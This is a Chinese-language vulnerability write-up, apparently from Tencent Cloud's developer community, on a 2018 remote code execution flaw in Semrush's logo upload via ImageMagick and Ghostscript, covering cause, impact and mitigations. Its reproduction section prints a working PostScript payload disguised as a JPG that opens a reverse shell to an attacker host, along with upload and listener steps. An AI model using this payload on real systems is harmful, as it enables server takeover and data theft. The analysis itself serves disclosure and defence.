
## 一、漏洞背景与发现场景

该漏洞由研究者fransrosen于2018年8月31日提交至Semrush的漏洞响应平台，属于第三方组件（ImageMagick+Ghostscript）配置不当、版本未及时修补导致的远程代码执行漏洞。研究者在测试Semrush报告构造器的Logo上传功能时发现，平台对上传图片的处理依赖ImageMagick，但该ImageMagick版本未正确修补相关漏洞，且未在配置文件中限制危险格式，导致攻击者可利用PostScript代码触发Ghostscript执行任意命令，实现远程代码执行。
漏洞核心场景：Semrush报告构造器的Logo上传入口（https://www.semrush.com/my_reports/constructor）允许用户上传图片文件，平台通过ImageMagick对上传文件进行处理。由于ImageMagick未正确配置，且版本存在漏洞，攻击者可将恶意PostScript代码伪装成JPG文件上传，ImageMagick在处理该文件时会调用Ghostscript，而Ghostscript在执行PostScript代码时未进行严格限制，最终导致攻击者可执行任意系统命令，获得服务器访问权限。
值得注意的是，研究者明确提及该漏洞与Tavis Ormandy于2018年8月21日在oss-security邮件列表中披露的Ghostscript安全隐患相关（对应URL：http://openwall.com/lists/oss-security/2018/08/21/2），Tavis Ormandy当时就强烈建议 distributions默认在policy.xml中禁用PS、EPS、PDF、XPS等格式，以防范Ghostscript相关漏洞。
此外，文档中提及的多个Semrush相关URL（https://www.semrush.com/my_reports/constructor、https://www.semrush.com/my_reports/、https://4lemon.ru/2017-01-17_facebook_imagetragick_remote_code_execution.html、https://www.semrush.com/product/promo/accept.html?promo=）中，部分显示字数超限或无有效内容，不影响漏洞核心分析；仅HackerOne赏金设置链接（https://hackerone.com/settings/bounties）显示解析失败，与本漏洞无关。
## 二、漏洞核心原理

该漏洞的核心成因是**Semrush平台ImageMagick组件配置不当、版本未及时修补，且未遵循Ghostscript安全建议**，导致恶意PostScript代码可被执行，具体原理可结合ImageMagick与Ghostscript的交互逻辑、相关安全隐患拆解为以下三点：
### 2.1 ImageMagick版本未正确修补，存在格式解析漏洞

Semrush平台使用的ImageMagick版本未正确修补此前披露的安全漏洞，该漏洞允许攻击者通过上传伪装成图片格式（如JPG）的PostScript文件，绕过ImageMagick的格式校验。ImageMagick在处理此类文件时，会自动调用Ghostscript进行解析，而未对文件内容进行严格过滤，为后续代码执行埋下隐患。
### 2.2 Ghostscript安全边界脆弱，PostScript代码可触发命令执行

Ghostscript作为一款PostScript和PDF文件解析工具，其-dSAFER模式存在安全缺陷，Tavis Ormandy已披露多种绕过该模式的方法，包括通过“null restore”操作绕过invalidaccess检查，进而执行shell命令。攻击者可利用这一缺陷，在PostScript代码中构造恶意命令，当Ghostscript解析该代码时，会执行对应的系统命令，实现远程代码执行。
### 2.3 未配置ImageMagick策略文件，未禁用危险格式

Tavis Ormandy在2018年8月的披露中明确建议，应在ImageMagick的policy.xml配置文件中禁用PS、EPS、PDF、XPS等危险格式，以阻断Ghostscript相关漏洞的利用路径。但Semrush平台未遵循该建议，未对ImageMagick的可处理格式进行限制，允许PostScript格式代码被解析，直接导致漏洞可被利用。
本质上，该漏洞是“第三方组件漏洞未及时修补+配置不当”共同导致的问题：ImageMagick的格式解析漏洞为攻击者提供了注入恶意代码的入口，Ghostscript的安全缺陷使得恶意代码可被执行，而平台未通过配置限制危险格式，最终导致远程代码执行漏洞的出现。
## 三、漏洞利用条件与复现步骤

该漏洞的利用门槛较低，无需复杂技术手段，仅需构造恶意PostScript文件并上传即可触发，研究者fransrosen已提供完整的PoC payload、复现过程及相关截图（F340480），具体如下：
### 3.1 利用前提条件

- 攻击者需拥有Semrush平台账号，能够访问报告构造器功能（https://www.semrush.com/my_reports/constructor）；
- 目标平台（Semrush）的Logo上传功能使用未正确修补的ImageMagick版本，且未在policy.xml中禁用PS等危险格式；
- 攻击者需构造包含恶意PostScript代码的伪装图片文件，并准备好监听服务器（用于接收反向shell）。

### 3.2 漏洞复现步骤（PoC）

1. 构造恶意文件：创建一个文本文件，写入恶意PostScript代码，将其保存为test.jpg（伪装成JPG格式），核心payload如下（其中███为攻击者监听服务器IP）： %!PS userdict /setpagedevice undef legal { null restore } stopped { pop } if legal mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/███/8080 0>&1') currentdevice putdeviceprops； 
2. 启动监听：在攻击者的服务器上启动端口监听（如8080端口），等待目标服务器的反向连接；
3. 上传恶意文件：登录Semrush平台，进入报告构造器页面（https://www.semrush.com/my_reports/constructor），找到Logo上传入口，将构造好的test.jpg文件上传；
4. 触发漏洞：平台的ImageMagick在处理该文件时，会调用Ghostscript解析PostScript代码，执行其中的反向shell命令；
5. 获取控制权：攻击者的监听服务器接收到反向连接，成功获得目标服务器的shell权限，可执行ls、whoami等系统命令，验证漏洞利用成功；
6. 验证服务器归属：攻击者通过执行cat /etc/hosts命令，确认目标服务器为Semrush官方实例，漏洞复现完成。

补充说明：研究者通过执行ls命令查看服务器目录，确认存在app等核心目录，并通过访问Semrush相关路径，进一步验证目标服务器的归属。此外，Semrush安全团队成员Andrey Leonov（曾披露Facebook ImageTragick远程代码执行漏洞，对应URL内容超限）也对该漏洞的发现表示认可，凸显了该漏洞的真实性与严重性。
![image](https://developer.qcloudimg.com/http-save/yehe-8600665/e85e6c77c618ef95f5a31338893020ab.png)
## 四、漏洞危害深度分析

该漏洞属于高危远程代码执行漏洞，攻击者可通过漏洞获得服务器完全控制权，危害直接且严重，具体可分为以下4类：
### 4.1 服务器控制权泄露，敏感数据面临窃取风险

攻击者通过漏洞获得服务器shell权限后，可任意读取服务器上的敏感数据，包括Semrush平台的用户信息、商业数据、报告内容等。作为数字营销工具平台，Semrush存储了大量用户的营销数据、关键词信息等敏感内容，一旦泄露，会导致用户隐私受损、商业利益遭受损失。
### 4.2 执行恶意命令，破坏服务器正常运行

攻击者可在服务器上执行任意系统命令，包括删除核心文件、修改系统配置、植入恶意程序（如木马、病毒）等，导致服务器瘫痪、平台服务中断，影响Semrush平台的正常运营，给平台带来巨大的经济损失和口碑影响。
### 4.3 横向渗透，扩大攻击范围

若目标服务器属于Semrush内部网络的一部分，攻击者可通过该服务器作为跳板，横向渗透至Semrush的其他服务器，扩大攻击范围，可能导致整个内部网络被入侵，引发更严重的安全事件。
### 4.4 利用服务器发起进一步攻击

攻击者可利用被控制的Semrush服务器，发起针对其他平台或用户的攻击（如DDoS攻击、钓鱼攻击），将攻击溯源至Semrush平台，损害平台的合法权益和市场信誉。
## 五、漏洞修复

### 5.1 漏洞修复方案

结合漏洞核心成因，Semrush官方采取了紧急热修复措施，快速阻断漏洞利用，具体修复方案可结合漏洞原理及研究者反馈推导如下：
1. 修补ImageMagick版本：升级ImageMagick至已修复相关漏洞的版本，修复格式解析漏洞，防止恶意PostScript文件被解析；
2. 配置ImageMagick策略文件：按照Tavis Ormandy的建议，在policy.xml中禁用PS、EPS、PDF、XPS等危险格式，仅允许GIF、JPG、PNG等安全图片格式被处理，从源头阻断漏洞利用路径；
3. 加强文件上传校验：在Logo上传功能中增加额外的文件内容校验，过滤包含PostScript代码的恶意文件，即使ImageMagick出现漏洞，也能进一步防范攻击；
4. 优化WAF规则：调整WAF配置，加强对上传文件的监控，及时拦截恶意文件上传请求，提升平台防御能力。

### 5.2 临时缓解措施（修复前）

对于类似使用ImageMagick处理文件上传的平台，在漏洞修复前，可采取以下临时措施，降低漏洞利用风险：
- 紧急配置policy.xml：在ImageMagick的policy.xml中禁用PS、EPS、PDF、XPS等危险格式，仅保留必要的安全图片格式；
- 限制文件上传类型：在前端和后端同时限制上传文件的格式，仅允许GIF、JPG、PNG等常见图片格式，拒绝可疑文件；
- 升级相关组件：及时升级ImageMagick、Ghostscript至最新安全版本，修补已知漏洞；
- 监控上传日志：重点监控文件上传行为，及时发现异常上传请求（如伪装成图片的PostScript文件），并拦截相关账号。

## 六、漏洞启示与总结

该Semrush Logo上传远程代码执行漏洞，本质上是“第三方组件安全管理缺失”导致的典型漏洞——平台未及时修补ImageMagick漏洞，未遵循行业安全建议配置组件，仅依赖组件默认设置，最终导致严重的远程代码执行风险。结合该漏洞及文档中提及的Ghostscript安全隐患、相关URL报错信息（不影响核心分析），可总结出以下几点安全启示：
1. 重视第三方组件安全管理：对于ImageMagick、Ghostscript等常用第三方组件，需建立常态化的版本更新机制，及时修补已知漏洞；同时，严格按照行业安全建议配置组件，禁用危险功能和格式，降低漏洞利用风险；
2. 文件上传功能需多重防护：对于文件上传场景，不能仅依赖前端格式校验，需在后端进行文件格式、内容的双重校验，过滤恶意代码，尤其要防范伪装成合法格式的恶意文件；
3. 关注行业安全披露，及时响应：密切关注oss-security等安全邮件列表、漏洞平台的披露信息，对于涉及自身使用组件的安全隐患，需及时评估并采取防御措施，避免漏洞被攻击者利用；
4. 完善应急响应机制：Semrush官方的高效应急响应值得借鉴，从漏洞提交到修复仅用数小时，有效降低了漏洞带来的危害；平台应建立完善的漏洞响应流程，快速验证、修复漏洞，并及时向研究者反馈，提升漏洞处理效率。


总结而言，该漏洞再次凸显了第三方组件安全的重要性——看似不起眼的组件配置不当、版本滞后，可能导致服务器控制权泄露、敏感数据被盗等严重后果。对于Semrush这类拥有大量用户数据的平台而言，必须将第三方组件安全纳入整体安全体系，加强配置管理、版本更新和漏洞监控，同时重视漏洞赏金计划的作用，通过激励安全研究者，及时发现并修复安全隐患，才能真正保障平台和用户的安全。此外，研究者fransrosen与Semrush安全团队的高效协作，也为漏洞快速修复提供了保障，彰显了安全社区合作的重要性。

该漏洞由研究者fransrosen于2018年8月31日提交至Semrush的漏洞响应平台，属于第三方组件（ImageMagick+Ghostscript）配置不当、版本未及时修补导致的远程代码执行漏洞。研究者在测试Semrush报告构造器的Logo上传功能时发现，平台对上传图片的处理依赖ImageMagick，但该ImageMagick版本未正确修补相关漏洞，且未在配置文件中限制危险格式，导致攻击者可利用PostScript代码触发Ghostscript执行任意命令，实现远程代码执行。漏洞核心场景：Semrush报告构造器的Logo上传入口（https://www.semrush.com/my_reports/constructor）允许用户上传图片文件，平台通过ImageMagick对上传文件进行处理。由于ImageMagick未正确配置，且版本存在漏洞，攻击者可将恶意PostScript代码伪装成JPG文件上传，ImageMagick在处理该文件时会调用Ghostscript，而Ghostscript在执行PostScript代码时未进行严格限制，最终导致攻击者可执行任意系统命令，获得服务器访问权限。值得注意的是，研究者明确提及该漏洞与Tavis Ormandy于2018年8月21日在oss-security邮件列表中披露的Ghostscript安全隐患相关（对应URL：http://openwall.com/lists/oss-security/2018/08/21/2），Tavis Ormandy当时就强烈建议 distributions默认在policy.xml中禁用PS、EPS、PDF、XPS等格式，以防范Ghostscript相关漏洞。此外，文档中提及的多个Semrush相关URL（https://www.semrush.com/my_reports/constructor、https://www.semrush.com/my_reports/、https://4lemon.ru/2017-01-17_facebook_imagetragick_remote_code_execution.html、https://www.semrush.com/product/promo/accept.html?promo=）中，部分显示字数超限或无有效内容，不影响漏洞核心分析；仅HackerOne赏金设置链接（https://hackerone.com/settings/bounties）显示解析失败，与本漏洞无关。

Semrush 漏洞分析：Logo上传功能远程代码执行（RCE）漏洞

该漏洞由研究者fransrosen于2018年8月31日提交至Semrush的漏洞响应平台，属于第三方组件（ImageMagick+Ghostscript）配置不当、版本未及时修补导致的远程代码执行漏洞。研究者在测试Semrush报告构造器的Logo上传功能时发现，平台对上传图片的处理依赖ImageMagick，但该ImageMagick版本未正确修补相关漏洞，且未在配置文件中限制危险格式，导致攻

安全工程师

人工智能

2018年Semrush报告构造器Logo上传功能存在高危远程代码执行漏洞，因ImageMagick+Ghostscript组件配置不当导致。攻击者可上传恶意PostScript文件触发任意命令执行，获取服务器控制权。漏洞涉及用户数据泄露、服务器破坏等风险，Semrush通过升级组件、禁用危险格式快速修复。该案例警示企业需重视第三方组件安全管理，及时修补漏洞并强化文件上传校验机制。

漏洞修复

敏感数据

DDoS攻击

服务器

文章

问答

视频

教程

学习中心

腾讯云实验室

直播

竞赛

腾讯云代码分析专区

腾讯iOA零信任安全管理系统专区

腾讯云架构师技术同盟交流圈

腾讯云数据库专区

腾讯云智能顾问专区

腾讯云原生专区

腾讯混元专区

腾讯云TCE专区

腾讯云Lighthouse专区

腾讯云HAI专区

腾讯云Edgeone专区

腾讯云存储专区

腾讯云智能专区

腾讯轻联专区 

腾讯云开发专区

TAPD专区

腾讯轻量云游戏服专区

EdgeOne AI 安全实战专区

腾讯云最具价值专家

腾讯云架构师技术同盟

腾讯云创作之星

腾讯云开发者先锋

腾讯云代码助手

云原生构建

TAPD 敏捷项目管理

Cloud Studio

SDK中心

API中心

命令行工具

涵盖代码开发、场景应用、自动测试全流程，助你从零构建专属AI助手

一站式MCP教程库，解锁AI应用新玩法

聚焦“写作效率、视觉美观与运行性能”三方面进行全面升级，为您提供更高效、稳定的创作环境

社区富文本&Markdown编辑器全新改版上线，欢迎大家体验!

诚挚邀请您参与本次调研，分享您的真实使用感受与建议。您的反馈至关重要，感谢您的支持与参与！

社区新版编辑器体验调研

2018年Semrush报告构造器Logo上传功能存在高危远程代码执行漏洞，因ImageMagick+Ghostscript组件配置不当导致。攻击者可上传恶意PostScript文件触发任意命令执行，获取服务器控制权。漏洞涉及用户数据泄露、服务器破坏等风险，Semrush通过升级组件、禁用危险格式快速修复。该案例警示企...

Semrush 漏洞分析：Logo上传功能远程代码执行（RCE）漏洞-腾讯云开发者社区-腾讯云

Semrush 漏洞分析：Logo上传功能远程代码执行（RCE）漏洞

Semrush 漏洞分析：Logo上传功能远程代码执行（RCE）漏洞

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐